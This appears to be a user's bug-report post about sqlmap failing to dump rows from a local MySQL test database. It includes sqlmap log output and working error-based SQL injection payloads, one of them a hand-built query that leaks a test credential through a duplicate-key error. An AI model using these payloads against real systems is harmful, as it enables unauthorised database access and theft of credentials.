Hello!
I was playing around with sqlmap at home, and I noticed all of a sudden
that I couldn't get it to extract any columns or rows.
Database names, current users, tables and such works fine, but
extracting any columns with --dump doesn't work, and thus not getting
any rows either. --columns seems to work though, although if I do that
first and then --dump, it still won't work.
Here's some output from sqlmap:
At revision 4654.
[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table
'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on
database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+
The vulnerability used by sqlmap is the following error based one:
---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT
COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---
And if I try to extract data manually through my browser, then it works
perfectly:
Notice the extracted data: te...@ma...:aPassword
Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
x)a) AND (8882=8882)
PS: I tried specifying with "-C strTest1,strTest2" as well
Any ideas? :-)
Thanks in advance, and thanks for a great tool (helps me a lot in my
work, and saves me time from having to write my own scripts all the time
to test my software)!